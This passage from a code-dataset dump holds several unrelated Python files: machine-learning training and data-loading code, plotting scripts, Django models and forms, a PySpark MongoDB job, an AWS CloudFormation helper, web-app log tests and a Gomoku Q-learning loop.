n_vis_features=500):\n\t\tprint('Building model')\n\t\treturn Model(n_vis_features, opts=self.opts)\n\n\tdef setup_opt(self, optimizer_lambda=None, scheduler_lambda=None, solver_lambda=None):\n\t\t# Define optimizer, scheduler, solver\n\t\tif self.optimizer == None:\n\t\t\tprint('Building optimizer...')\n\t\t\tself.optimizer = optimizer_lambda(self.model.parameters(), self.opts) if optimizer_lambda else torch.optim.Adam(self.model.parameters(), lr=self.opts.lr)\n\t\tif self.scheduler == None and not 
self.opts.no_scheduler:\n\t\t\tprint('Building scheduler...')\n\t\t\tself.scheduler = scheduler_lambda(self.optimizer) if scheduler_lambda else torch.optim.lr_scheduler.MultiStepLR(self.optimizer, [x * self.opts.backprop_every for x in [35, 75, 120, 200, 400, 600, 800]], 0.5)\n\t\tif self.solver == None:\n\t\t\tprint('Building solver...')\n\t\t\tif solver_lambda:\n\t\t\t\tself.solver = solver_lambda(self.model, self.optimizer, self.scheduler, loss_calculator, self.opts.__dict__)\n\t\t\telse:\n\t\t\t\tif self.opts.weighted_loss:\n\t\t\t\t\tprint('Using weighted loss...')\n\t\t\t\t\tpred_klasses = torch.Tensor(self.trainloader.dataset.triplets())[:,1] - 1\n\t\t\t\t\tassert pred_klasses.max() == 69, pred_klasses.max()\n\t\t\t\t\tassert pred_klasses.min() == 0, pred_klasses.min()\n\t\t\t\t\tweights = torch.histc(pred_klasses, bins=70, min=0, max=69)\n\t\t\t\t\ttrain_loss_fn = nn.CrossEntropyLoss(weights)\n\t\t\t\t\ttrain_loss = LossCalculator(self.model, input_key=lambda model, batch: model(batch), target_key='preds', loss_fn=train_loss_fn)\n\t\t\t\telse:\n\t\t\t\t\tprint('NOT using weighted loss...')\n\t\t\t\t\ttrain_loss = LossCalculator(self.model, input_key=lambda model, batch: model(batch), target_key='preds')\n\t\t\t\ttest_loss = LossCalculator(self.model, input_key=lambda model, batch: model(batch), target_key='preds')\n\t\t\t\tself.solver = Solver(self.model, self.optimizer, verbose=True, scheduler=self.scheduler, train_loss=train_loss, test_loss=test_loss, **self.opts.__dict__)\n\n\tdef setup_data(self):\n\t\ttransform = unrel.TRANSFORM\n\t\t# Initialize trainset\n\t\tself.trainset = data.Dataset(split='train', pairs='annotated', transform=transform)\n\t\tif self.opts.train_size:\n\t\t\tprint('Using subset of %d from train_set' % self.opts.train_size)\n\t\t\tbatch_sampler = sampler.SequentialSampler(range(self.opts.train_size))\n\t\telse:\n\t\t\tbatch_sampler = None\n\t\tself.trainloader = data.FauxDataLoader(self.trainset, sampler=batch_sampler, batch_size=self.opts.batch_size)\n\t\t# Initialize testset\n\t\tif self.opts.do_validation:\n\t\t\tself.testset = data.Dataset(split='test', pairs='annotated', transform=transform)\n\t\t\tbatch_sampler = sampler.BatchSampler(sampler.SequentialSampler(self.testset), self.opts.test_batch_size, False) # make test set load without shuffling so that we can use Tyler's RecallEvaluator\n\t\t\tself.testloaders = [data.FauxDataLoader(self.testset, sampler=batch_sampler)]\n\t\telse:\n\t\t\tprint('No testset')\n\t\t\tself.testloaders = []\n\nif __name__ == '__main__':\n\tr = Runner()\n\tr.setup()\n\tr.train()\n","sub_path":"run/e2e_runner.py","file_name":"e2e_runner.py","file_ext":"py","file_size_in_byte":6364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"}
+{"seq_id":"558423003","text":"from data_aug.gaussian_blur import GaussianBlur\n\n#####\nfrom PIL import Image, ImageOps\n\nimport os\nimport glob \nimport torch\nimport pickle\nimport numpy as np\nimport pandas as pd\nimport torchvision.transforms as transforms \n\nfrom torch.utils.data import Dataset, DataLoader\nfrom torch.utils.data.sampler import SubsetRandomSampler\nfrom torchvision import datasets\n\nnp.random.seed(987)\ntorch.manual_seed(987)\n\nimg_size=256\nimg_size=512\n\n# ich,ivh,sah,sdh,edh\n\nclass BloodDataset_Test(Dataset):\n    def __init__(self, path, ch=1):\n        self.path = path\n        self.ch = ch \n        self.trans = transforms.Compose([\n            transforms.Resize(img_size),\n            transforms.ToTensor(),\n            
transforms.Normalize(mean=[0.5]*self.ch,std=[0.5]*self.ch)\n ]) \n \n self.data = []\n self.dirs = glob.glob(path+\"/*\")\n \n dirs = os.listdir(path)\n for _dir in sorted(dirs):\n files = os.listdir(os.path.join(path,_dir))\n for _fname in files:\n self.data.append((_dir, # ex: ID_3bfxedafae \n _fname, # ex: 3bfxedafae_3.jpg \n _fname[:_fname.find('_')], # ex: 3bfxedafae \n int(_fname[_fname.find('_')+1:_fname.find('.jpg')])) # ex:3\n )\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, idx):\n _dir, _fname, _uid, _idx = self.data[idx]\n if self.ch==1:\n img_path = os.path.join(self.path,_dir,_fname)\n img = Image.open(img_path).resize((img_size,img_size))\n img = self.trans(img)\n return img, _dir, _fname\n else:\n stack = []\n for i in range(self.ch):\n img_path = os.path.join(self.path,_dir,f\"{_uid}_{_idx+i-self.ch//2}.jpg\")\n if not os.path.exists(img_path):\n img_path = os.path.join(self.path,_dir,_fname)\n img = Image.open(img_path).resize((img_size,img_size))\n img = np.array(img).astype(np.uint8)\n stack.append(img)\n stack = np.stack(stack, axis=-1)\n img = Image.fromarray(stack)\n img = self.trans(img)\n return img, _dir, _fname\n\nclass BloodDataset(Dataset):\n def __init__(self, path, dirs, trans, ch=1):\n assert ch%2==1\n\n df = pd.read_csv(path.rstrip('/')+\".csv\")\n #df = pd.read_csv(path.rstrip('/')+\"_clean.csv\")\n \n self.path = path\n self.dirs = dirs \n self.trans = trans \n self.ch = ch \n \n self.data = []\n self.label = []\n for _dir in dirs:\n sub_df = df.loc[df['dirname']==_dir]\n for row in sub_df.to_numpy():\n _dir, _fname = row[:2]\n self.data.append((_dir, # ex: ID_3bfxedafae\n _fname, # ex: 3bfxedafae_3.jpg\n _fname[:_fname.find('_')], # ex:3bfxedafae\n int(_fname[_fname.find('_')+1:_fname.find('.jpg')])) # ex:3\n )\n self.label.append(row[2:])\n self.label = np.stack(self.label, axis=0)\n \n def __len__(self):\n return len(self.data)\n \n def __getitem__(self, idx):\n _dir, _fname, _uid, _idx = self.data[idx]\n if self.ch==1:\n img_path = os.path.join(self.path,_dir,f\"{_uid}_{_idx}.jpg\")\n img = Image.open(img_path).resize((img_size,img_size))\n img = self.trans(img)\n return img, self.label[idx].astype(np.bool)\n else:\n stack = []\n for i in range(self.ch):\n img_path = os.path.join(self.path,_dir,f\"{_uid}_{_idx+i-self.ch//2}.jpg\")\n if not os.path.exists(img_path):\n img_path = os.path.join(self.path,_dir,f\"{_uid}_{_idx}.jpg\")\n img = Image.open(img_path).resize((img_size,img_size))\n img = np.array(img).astype(np.uint8)\n stack.append(img)\n stack = np.stack(stack, axis=-1)\n img = Image.fromarray(stack)\n img = self.trans(img)\n return img, self.label[idx].astype(np.bool)\n\n def collate_fn(self, samples):\n batch_imgs, batch_lbls = [],[]\n for img, lbl in samples:\n batch_imgs.append(img.unsqueeze(0))\n batch_lbls.append(lbl)\n batch_imgs = torch.cat(batch_imgs,dim=0)\n batch_lbls = torch.tensor(batch_lbls).float()\n return batch_imgs, batch_lbls\n \n @staticmethod \n def get_transform(ch=1):\n train_trans = transforms.Compose([\n transforms.Resize(img_size),\n transforms.RandomRotation(60, fill=(0,)),\n transforms.RandomHorizontalFlip(),\n transforms.RandomApply([\n transforms.ColorJitter(0.1,0.1,0.1,0)\n ],p=0.4),\n #GaussianBlur(kernel_size=int(0.01 * img_size)),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.5]*ch, std=[0.5]*ch)\n ])\n test_trans = transforms.Compose([\n transforms.Resize(img_size),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.5]*ch, std=[0.5]*ch)\n ])\n return train_trans, 
test_trans\n\nclass DatasetWrapper(object):\n\n def __init__(self, path, bsize, valid_size=0.15, ch=1):\n self.path = path \n self.bsize = bsize\n self.valid_size = valid_size\n self.ch = ch \n \n def get_dataloaders(self):\n # split train dirs\n dirs = os.listdir(self.path)\n np.random.shuffle(dirs)\n split = int(len(dirs) * (1-self.valid_size))\n train_dirs, valid_dirs = dirs[:split], dirs[split:]\n\n # dump train valid split\n os.system(\"mkdir -p ./checkpoints\")\n '''\n with open(\"./checkpoints/train_valid_split.pkl\", 'wb') as f:\n pickle.dump({'train':train_dirs, 'valid':valid_dirs},\n f, protocol=pickle.HIGHEST_PROTOCOL)\n '''\n with open(\"./checkpoints/train_set.pkl\", \"wb\") as f:\n pickle.dump(train_dirs, f, protocol=pickle.HIGHEST_PROTOCOL)\n with open(\"./checkpoints/valid_set.pkl\", \"wb\") as f:\n pickle.dump(valid_dirs, f, protocol=pickle.HIGHEST_PROTOCOL)\n print(\"\\t[Info] dump train valid set\")\n\n # data aug\n train_trans, valid_trans = BloodDataset.get_transform(self.ch)\n\n # dataset\n train_dataset = BloodDataset(self.path, train_dirs, train_trans, self.ch)\n valid_dataset = BloodDataset(self.path, valid_dirs, valid_trans, self.ch)\n\n # dataloader\n train_loader = DataLoader(train_dataset,\n batch_size=self.bsize,\n collate_fn=train_dataset.collate_fn,\n num_workers=6,\n shuffle=True)\n valid_loader = DataLoader(valid_dataset,\n batch_size=self.bsize,\n collate_fn=valid_dataset.collate_fn,\n num_workers=6)\n return train_loader, valid_loader \n\nclass SimCLRTrans(object):\n def __init__(self, trans):\n self.trans = trans\n\n def __call__(self, sample):\n xi = self.trans(sample)\n xj = self.trans(sample)\n return xi,xj\n\n","sub_path":"wubinray/base/data_aug/dataset_wrapper.py","file_name":"dataset_wrapper.py","file_ext":"py","file_size_in_byte":7547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"506021726","text":"import matplotlib.pyplot as plt\r\nimport pandas as pd\r\n\r\n\r\ndef autolabel(rects):\r\n for rect in rects:\r\n height = rect.get_height()\r\n plt.text(rect.get_x()+rect.get_width()/2. 
- 0.1, 1.015*height, '%s' % int(height))\r\n\r\ndata = pd.read_csv('./data/train.csv').values[:, 1]\r\nprint(data.shape)\r\nmale, female = 0, 0\r\nfor i in range(data.shape[0]):\r\n if data[i] == 0:\r\n male += 1\r\n else:\r\n female += 1\r\nname_list = ['male', 'female']\r\nnum_list = [male, female]\r\nautolabel(plt.bar(range(len(num_list)), num_list, color='br', tick_label=name_list))\r\nplt.xlabel('label')\r\nplt.ylabel('number')\r\nplt.title('label statistics')\r\nplt.savefig('./figure/label statistics.png')\r\nplt.show()\r\n","sub_path":"draw_2.py","file_name":"draw_2.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"119962770","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 2 17:54:33 2017\n\n@author: chen\n\"\"\"\nimport scipy.io\n\ndata = scipy.io.loadmat('tuning.mat')\n\nimport numpy as np\n\nimport matplotlib.pyplot as plt\n\nplt.plot(np.transpose(data['stim']), np.transpose(data['neuron1']))\n\nplt.plot(np.transpose(data['stim']), np.transpose(data['neuron2']))\n\nplt.plot(np.transpose(data['stim']), np.transpose(data['neuron3']))\n\nplt.plot(np.transpose(data['stim']), np.transpose(data['neuron4']))\n\n\n\na1 = max(np.mean(data['neuron1'], axis = 0))\n\nb1 = max(np.mean(data['neuron2'], axis = 0))\n\nz = np.degrees(np.arctan(np.mean(data1['r2'])/b1/np.mean(data1['r1'])*a1))\nplt.plot(np.mean(data['neuron1']*10, axis = 0), np.var(data['neuron1']*10,axis = 0))\nplt.plot(np.mean(data['neuron2']*10, axis = 0), np.var(data['neuron2']*10,axis = 0))\nplt.plot(np.mean(data['neuron3']*10, axis = 0), np.var(data['neuron3']*10,axis = 0))\nplt.plot(np.mean(data['neuron4']*10, axis = 0), np.var(data['neuron4']*10,axis = 0))","sub_path":"projects/Chen_Liang/decoding.py","file_name":"decoding.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"334817726","text":"from django.db import models\nfrom polymorphic import PolymorphicModel\n\nclass Course(models.Model):\n title = models.CharField(max_length=255)\n blocks = models.ManyToManyField('Block')\n\nclass Block(PolymorphicModel):\n active = models.BooleanField(default=True)\n\n def describe(self):\n \"\"\"Return a dictionary-like object with key properties.\"\"\"\n return { 'type': 'Block', 'active': self.active }\n\nclass TextBlock(Block):\n title = models.CharField(max_length=255)\n body = models.TextField()\n\n def describe(self):\n \"\"\"Return a dictionary-like object with key properties.\"\"\"\n desc = super(TextBlock, self).describe()\n desc = {} if desc is None else desc\n desc.update({\n 'type': 'text-block',\n 'title': self.title,\n 'body': self.body})\n return desc\n\nclass ImageBlock(Block):\n link = models.CharField(max_length=255)\n caption = models.CharField(max_length=255)\n\n def describe(self):\n \"\"\"Return a dictionary-like object with key properties.\"\"\"\n desc = super(ImageBlock, self).describe()\n desc = {} if desc is None else desc\n desc.update({\n 'type': 'image-block',\n 'link': self.link,\n 'caption': self.caption})\n return desc\n","sub_path":"fabled/course/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"321645810","text":"\ndata = open('day9.in').read().strip()\n\nscore, level, num_garbage, i = [0] * 4\nin_garbage = False\n\n\nwhile i < len(data):\n c = 
data[i]\n if in_garbage:\n if c == '!':\n i += 1\n elif c == '>':\n in_garbage = False\n else:\n num_garbage += 1\n else:\n if c == '{':\n level += 1\n elif c == '}':\n score += level\n level -= 1\n elif c == '<':\n in_garbage = True\n i += 1\n\nprint('Part 1: {}\\nPart 2: {}'.format(score, num_garbage))\n\n","sub_path":"python/Day9/day9.py","file_name":"day9.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"420127786","text":"from pyspark.sql import SparkSession\nfrom pyspark.sql.functions import date_trunc\n\nspark = SparkSession \\\n .builder \\\n .appName(\"df1\") \\\n .config(\"spark.mongodb.input.uri\", \"mongodb://edgedbuser:edgedb@10.0.0.25:27017/edgedb.tspump\") \\\n .config(\"spark.mongodb.output.uri\", \"mongodb://edgedbuser:edgedb@10.0.0.25:27017/edgedb.tspumpO\") \\\n .config(\"spark.jars.packages\", \"org.mongodb.spark:mongo-spark-connector_2.12:3.0.1\") \\\n .getOrCreate()\n\ndf = spark.read.format(\"com.mongodb.spark.sql.DefaultSource\").load()\n\ndf.printSchema() \ndf.show(10) \n\n#To remove the seconds data from the frame\ndf1=df.withColumn('hour', date_trunc(\"minute\",\"ts\"))\n\n#To show the aggregation done on the grouped data \ndf1.groupby('hour').mean().show()\n\n#To select the avg values \ndf2=df1.groupby('hour').mean()\ndf2.select('hour','avg(current)').show()\n","sub_path":"spark/analysis/df1.py","file_name":"df1.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"357991703","text":"\nfrom django.forms import ModelForm\nfrom .models import (Documents, \n Student,\n ParentDetails,\n ContactDetails,\n AdditionalDetails)\nfrom django.forms.widgets import DateInput, Select\n\n\n\nclass StudentFrom(ModelForm):\n class Meta:\n model = Student\n exclude = ['user', 'create_at', 'student_id']\n widgets = {\n 'DOB': DateInput(attrs={'type': 'date'})\n }\n\n def __init__(self, *args, **kwargs):\n super(StudentFrom, self).__init__(*args, **kwargs)\n for field_name, field in self.fields.items():\n field.widget.attrs['class'] = 'form-control'\n\n\nclass DocumentsFrom(ModelForm):\n class Meta:\n model = Documents\n exclude = ['user', 'create_at', 'student_id']\n\n def __init__(self, *args, **kwargs):\n super(DocumentsFrom, self).__init__(*args, **kwargs)\n for field_name, field in self.fields.items():\n field.widget.attrs['class'] = 'form-control pb-4'\n\n\nclass ParentDetailsFrom(ModelForm):\n class Meta:\n model = ParentDetails\n exclude = ['user', 'create_at', 'student_id']\n widgets = {\n 'father_dob': DateInput(attrs={'type': 'date'}),\n 'mother_dob': DateInput(attrs={'type': 'date'})\n }\n\n def __init__(self, *args, **kwargs):\n super(ParentDetailsFrom, self).__init__(*args, **kwargs)\n for field_name, field in self.fields.items():\n field.widget.attrs['class'] = 'form-control'\n\n\nclass ContactDetailsFrom(ModelForm):\n class Meta:\n model = ContactDetails\n exclude = ['user', 'create_at', 'student_id']\n CHOICES = [('1', 'First'), ('2', 'Second')]\n widgets = {\n 'state': Select(attrs={'class':'form-control'}, choices=CHOICES),\n 'city': Select(attrs={'class':'form-control'}, choices=CHOICES),\n 'permanent_state':Select(attrs={'class':'form-control'}),\n 'permanent_city':Select(attrs={'class':'form-control'}),\n }\n\n\n def __init__(self, *args, **kwargs):\n super(ContactDetailsFrom, self).__init__(*args, **kwargs)\n for field_name, field in self.fields.items():\n 
field.widget.attrs['class'] = 'form-control'\n\n\nclass AdditionalDetailsFrom(ModelForm):\n    class Meta:\n        model = AdditionalDetails\n        exclude = ['user', 'create_at', 'student_id']\n\n    def __init__(self, *args, **kwargs):\n        super(AdditionalDetailsFrom, self).__init__(*args, **kwargs)\n        for field_name, field in self.fields.items():\n            field.widget.attrs['class'] = 'form-control'\n","sub_path":"student/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"}
+{"seq_id":"25024053","text":"import boto3\nfrom cfn_flip import flip, to_yaml, to_json\nimport json\nfrom deepmerge import Merger, always_merger\nfrom dictdiffer import diff, patch\nimport re\nimport yaml\n\ncfn = boto3.client('cloudformation')\n\ndiff_merger = Merger(\n    [\n        (list, [\"append\"]),\n        (dict, [\"merge\"])\n    ],\n    [\"override\"],\n    [\"override\"]\n)\n\n## Data Manipulation Functions\ndef compose_reason(detail, parameters):\n    if detail['ChangeSource'] == 'DirectModification':\n        return \"Resource {1} {0} changed through Direct Modification\".format(detail['Target']['Name'], detail['Target']['Attribute'])\n    elif detail['ChangeSource'] == 'ResourceAttribute':\n        return \"Resource {1} {0} changed by Resource attribute {2}\".format(detail['Target']['Name'], re.sub(\"(ies)$\", \"y\", detail['Target']['Attribute']), detail['CausingEntity'])\n    elif detail['ChangeSource'] == 'ResourceReference':\n        return \"Resource {1} {0} changed by Resource {2}\".format(detail['Target']['Name'], re.sub(\"(ies)$\", \"y\", detail['Target']['Attribute']), detail['CausingEntity'])\n    elif detail['ChangeSource'] == 'ParameterReference':\n        return \"Resource {1} {0} changed by Parameter {2}: {3}\".format(detail['Target']['Name'], re.sub(\"(ies)$\", \"y\", detail['Target']['Attribute']), detail['CausingEntity'], parameters[detail['CausingEntity']])\n    else:\n        return 'unknown'\n\ndef parse_reasons(change, parameters):\n    reasons = list(map(lambda x: compose_reason(x, parameters), change))\n    return reasons\n\ndef parse_event(event):\n    status_length = len(event['ResourceStatus'])\n    tabs = \"\\t\\t\\t\\t\\t\"\n\n    if status_length > 13:\n        tabs = \"\\t\\t\\t\\t\"\n\n    if status_length > 23:\n        tabs = \"\\t\\t\\t\"\n\n    if status_length > 27:\n        tabs = \"\\t\\t\"\n\n    if len(event['ResourceStatus']) == 44:\n        tabs = \"\\t\"\n\n    event_string = \"[{0}] {1} {2} \\t\\\"{3}\\\"\".format(\n        event['Timestamp'].strftime(\"%Y-%m-%d %H:%M:%S UTC\"),\n        \"{0}{1}\".format(event['ResourceStatus'], tabs),\n        event['ResourceType'],\n        event['LogicalResourceId']\n    )\n    return event_string\n\ndef construct_diff(args):\n    print(args)\n    if isinstance(args[1], str):\n        node_keys = args[1].split(\".\")\n    else:\n        node_keys = args[1]\n    leaf_index = len(node_keys) - 1\n\n    obj = current = {}\n    for index, key in enumerate(node_keys):\n        if index == leaf_index:\n            if args[0] == \"change\":\n                #current[key] = \"{0} -> {1}\".format(args[2][0], args[2][1])\n                current[\"- {0}\".format(key)] = args[2][0]\n                current[\"+ {0}\".format(key)] = args[2][1]\n            else:\n                if args[0] == \"add\":\n                    operator = \"+\"\n                elif args[0] == \"remove\":\n                    operator = \"-\"\n                if isinstance(args[2], str):\n                    current[\"{0} {1}\".format(operator, key)] = args[2]\n                elif isinstance(args[2], list):\n                    if isinstance(args[2][0], tuple):\n                        if isinstance(args[2][0][0], int):\n                            current[\"{0} {1}\".format(operator,key)] = [ args[2][0][1] ]\n                        else:\n                            current[key] = { \"{0} {1}\".format(operator,args[2][0][0]): args[2][0][1]}\n                    else:\n                        current[key] = 
list(map(lambda x: \"{0} {1}\".format(operator, x), args[2][0]))\n else:\n current[key] = {}\n current = current[key]\n return obj\n\ndef resource_diffs(orig, new):\n diffs = {}\n for resource in orig:\n if resource in list(new.keys()):\n resource_diff = diff(orig[resource], new[resource])\n if resource_diff:\n diffs[resource] = {}\n for index,dff in enumerate(list(resource_diff)):\n diffs[resource] = diff_merger.merge(diffs[resource], construct_diff(dff))\n return diffs\n\n## AWS API Function\ndef stack_list():\n stacks = cfn.list_stacks()\n names = list(map(lambda x: x['StackName'], stacks['StackSummaries']))\n return names\n\ndef stack_info(stack):\n stack_details = cfn.describe_stacks(StackName=stack)\n changesets = cfn.list_change_sets(StackName=stack)\n if len(changesets['Summaries']) > 0:\n stack_change_sets = list(map(lambda x: {\n 'name': x['ChangeSetName'],\n 'id': x['ChangeSetId'],\n 'status': x['Status'],\n 'exec_status': x['ExecutionStatus'],\n 'created': x['CreationTime']\n }, changesets['Summaries']))\n else:\n stack_change_sets = []\n details = list(map(lambda x: {\n 'name': stack,\n 'change_sets': stack_change_sets,\n #'current_change_set': x['ChangeSetId'],\n #'description': x['Description'],\n 'created': x['CreationTime'],\n #'last_updated': x['LastUpdatedTime'],\n 'status': x['StackStatus']\n }, stack_details['Stacks']))\n return details[0]\n\ndef change_set_info(stack, changeset):\n change_set = cfn.describe_change_set(StackName=stack, ChangeSetName=changeset)\n original_template_body = cfn.get_template(StackName=stack)['TemplateBody']\n change_set_template_body = cfn.get_template(StackName=stack, ChangeSetName=changeset)['TemplateBody']\n if isinstance(original_template_body, str):\n original_template = json.loads(to_json(original_template_body))\n print(\"Original Template is YAML\")\n else:\n original_template = dict(original_template_body)\n if isinstance(change_set_template_body, str):\n change_set_template = json.loads(to_json(change_set_template_body))\n print(\"New Template is YAML\")\n else:\n change_set_template = dict(change_set_template_body)\n\n orig_resources = original_template['Resources']\n new_resources = change_set_template['Resources']\n\n diffs = resource_diffs(orig_resources, new_resources)\n\n parameters = {item['ParameterKey']:item['ParameterValue'] for item in change_set['Parameters']}\n set_details = {\n 'parameters': parameters,\n 'changes': list(map(lambda x: {\n 'Action': x['ResourceChange']['Action'],\n 'LogicalResourceId': x['ResourceChange'].get('LogicalResourceId', None),\n 'PhysicalResourceId': x['ResourceChange'].get('PhysicalResourceId', None),\n 'Replacement': x['ResourceChange'].get('Replacement', None),\n 'ResourceType': x['ResourceChange']['ResourceType'],\n 'Scope': x['ResourceChange']['Scope'],\n 'Details': parse_reasons(x['ResourceChange']['Details'], parameters)\n }, change_set['Changes']))\n }\n\n set_info = { 'raw': change_set, 'processed': set_details, 'orig': orig_resources, 'new': new_resources, 'diffs': diffs }\n return set_info\n\ndef stack_events(stack, scope):\n raw_events = cfn.describe_stack_events(StackName=stack)['StackEvents']\n if scope:\n events = list(map(lambda x: parse_event(x), raw_events))\n print(\"Filtering events\")\n else:\n events = list(map(lambda x: parse_event(x), raw_events))\n return events\n\ndef apply_change_set(stack, changeset):\n cfn.execute_change_set(StackName=stack, ChangeSetName=changeset)\n return True\n\ndef delete_change_set(stack, changeset):\n cfn.delete_change_set(StackName=stack, 
ChangeSetName=changeset)\n return True\n","sub_path":"grayws/aws.py","file_name":"aws.py","file_ext":"py","file_size_in_byte":7328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"463792646","text":"import unittest\n\nfrom tests.factories import UserFactory, RoomLogEntryFactory, UserLogEntryFactory, \\\n UserWithHostFactory\n\nfrom hades_logs import HadesLogs\nfrom tests import InvalidateHadesLogsMixin\n\nfrom . import UserLogTestBase\nfrom ...hades_logs import DummyHadesWorkerBase\n\n\nclass AppWithoutHadesLogsTestCase(InvalidateHadesLogsMixin, UserLogTestBase):\n def test_only_warning_log_returned(self):\n # Multiple assertions in one method to avoid useless\n # setup/teardown which leads to 5s for this class\n hades_items = self.get_logs(logtype='hades')\n self.assertEqual(len(hades_items), 1)\n self.assertIn(\"logs cannot be displayed\", hades_items[0]['message'].lower())\n\n self.assertFalse(self.get_logs(logtype='user'))\n self.assertFalse(self.get_logs(logtype='room'))\n self.assertEqual(len(self.get_logs()), 1)\n\n\nclass RoomAndUserLogTestCase(UserLogTestBase):\n def create_factories(self):\n super().create_factories()\n self.relevant_user = UserFactory.create()\n self.room_log_entry = RoomLogEntryFactory(author=self.admin, room=self.relevant_user.room)\n self.user_log_entry = UserLogEntryFactory(author=self.admin, user=self.relevant_user)\n\n def assert_one_log(self, got_logs, expected_entry):\n self.assertEqual(len(got_logs), 1)\n item = got_logs[0]\n self.assertEqual(item['message'], expected_entry.message)\n self.assertEqual(item['user']['title'], expected_entry.author.name)\n\n def test_room_log_exists(self):\n items = self.get_logs(user_id=self.relevant_user.id, logtype='room')\n self.assert_one_log(items, self.room_log_entry)\n\n def test_user_log_exists(self):\n items = self.get_logs(user_id=self.relevant_user.id, logtype='user')\n self.assert_one_log(items, self.user_log_entry)\n\n def test_no_hades_log_exists(self):\n items = self.get_logs(user_id=self.relevant_user.id, logtype='hades')\n self.assertEqual(len(items), 1)\n item = items[0]\n self.assertIn(\" cannot be displayed\", item['message'].lower())\n self.assertIn(\" connected room\", item['message'].lower())\n\n\nclass IntegrationTestCase(InvalidateHadesLogsMixin, DummyHadesWorkerBase, UserLogTestBase):\n \"\"\"Frontend Tests for the endpoints utilizing live Hades Logs\n \"\"\"\n def create_factories(self):\n super().create_factories()\n self.relevant_user = UserWithHostFactory(patched=True)\n self.other_user = UserFactory.create()\n self.room_log_entry = RoomLogEntryFactory(author=self.admin, room=self.relevant_user.room)\n self.user_log_entry = UserLogEntryFactory(author=self.admin, user=self.relevant_user)\n\n def create_app(self):\n app = super().create_app()\n\n # Setup dummy_tasks hades logs\n app.config.update(self.hades_logs_config)\n HadesLogs(app)\n\n return app\n\n def test_hades_logs_are_returned(self):\n logs = self.get_logs(user_id=self.relevant_user.id, logtype='hades')\n self.assertEqual(len(logs), 4)\n for log in logs:\n if \"rejected\" in log['message'].lower():\n continue\n self.assertIn(\"– groups: \", log['message'].lower())\n self.assertIn(\"tagged)\", log['message'].lower())\n\n def test_disconnected_user_emits_warning(self):\n logs = self.get_logs(self.other_user.id, logtype='hades')\n self.assertEqual(len(logs), 1)\n self.assertIn(\"are in a connected room\", logs[0]['message'].lower())\n self.assertIn(\"logs cannot be displayed\", 
logs[0]['message'].lower())\n","sub_path":"tests/frontend/user/test_logs.py","file_name":"test_logs.py","file_ext":"py","file_size_in_byte":3598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"466218157","text":"import gomoku_env\nfrom gomoku_env import GomokuEnv, board_domination_heuristic\nimport numpy as np\nimport random\nfrom IPython.display import clear_output\nimport gym\ngym.register('Gomoku-v0', entry_point=GomokuEnv)\nenv = gym.make('Gomoku-v0')\n\n# for i_episode in range(1000):\n# observation = env_a.reset()\n# for t in range(100):\n# env_a.render()\n# action = env_a.action_space.sample()\n# observation, reward, done, info = env_a.step(action)\n# if done:\n# print(reward)\n# # print(\"Episode finished after {} timesteps\".format(t+1))\n# break\n# env_a.close()\n\nalpha = 0.1\ngamma = 0.6\nepsilon = 0.1\n\nverbose = False\n\na_q_table = dict()\nb_q_table = dict()\nwins, losses = 0, 0\n\nnum_of_episodes = 100000\nfor episode in range(0, num_of_episodes):\n\n # Reset the env_a\n a_state = env.reset()\n b_state = None\n # Initialize variables\n a_reward = 0\n b_reward = 0\n terminated = False\n while not terminated:\n if a_state not in a_q_table:\n a_q_table[a_state] = [0 if env.action_space.contains(i) else -np.inf for i in range(225)]\n # Take learned path or explore new actions based on the epsilon\n if random.uniform(0, 1) < epsilon:\n a_action = env.action_space.sample()\n else:\n a_action = np.argmax(a_q_table[a_state])\n\n # Take action\n next_b_state, b_reward, terminated, info = env.step(a_action, gomoku_env.PLAYER1)\n if verbose:\n print(env.observation_space)\n if terminated:\n if b_reward == -100:\n wins += 1\n if next_b_state not in b_q_table:\n b_q_table[next_b_state] = [0 if env.action_space.contains(i) else -np.inf for i in range(225)]\n # Recalculate\n if b_state is not None:\n b_q_value = b_q_table[b_state][b_action]\n max_b_value = np.max(b_q_table[next_b_state])\n new_b_q_value = (1 - alpha) * b_q_value + alpha * (b_reward + gamma * max_b_value)\n\n # Update Q-table\n b_q_table[b_state][b_action] = new_b_q_value\n b_state = next_b_state\n if terminated:\n break\n\n if b_state not in b_q_table:\n b_q_table[b_state] = [0 if env.action_space.contains(i) else -np.inf for i in range(225)]\n # Take learned path or explore new actions based on the epsilon\n if random.uniform(0, 1) < epsilon:\n b_action = env.action_space.sample()\n else:\n b_action = np.argmax(b_q_table[b_state])\n\n # Take action\n next_a_state, a_reward, terminated, info = env.step(b_action, gomoku_env.PLAYER2)\n if verbose:\n print(env.observation_space)\n if terminated:\n if a_reward == -100:\n losses += 1\n if next_a_state not in a_q_table:\n a_q_table[next_a_state] = [0 if env.action_space.contains(i) else -np.inf for i in range(225)]\n # Recalculate\n a_q_value = a_q_table[a_state][a_action]\n max_a_value = np.max(a_q_table[next_a_state])\n new_q_value = (1 - alpha) * a_q_value + alpha * (b_reward + gamma * max_a_value)\n\n # Update Q-table\n a_q_table[a_state][a_action] = new_q_value\n a_state = 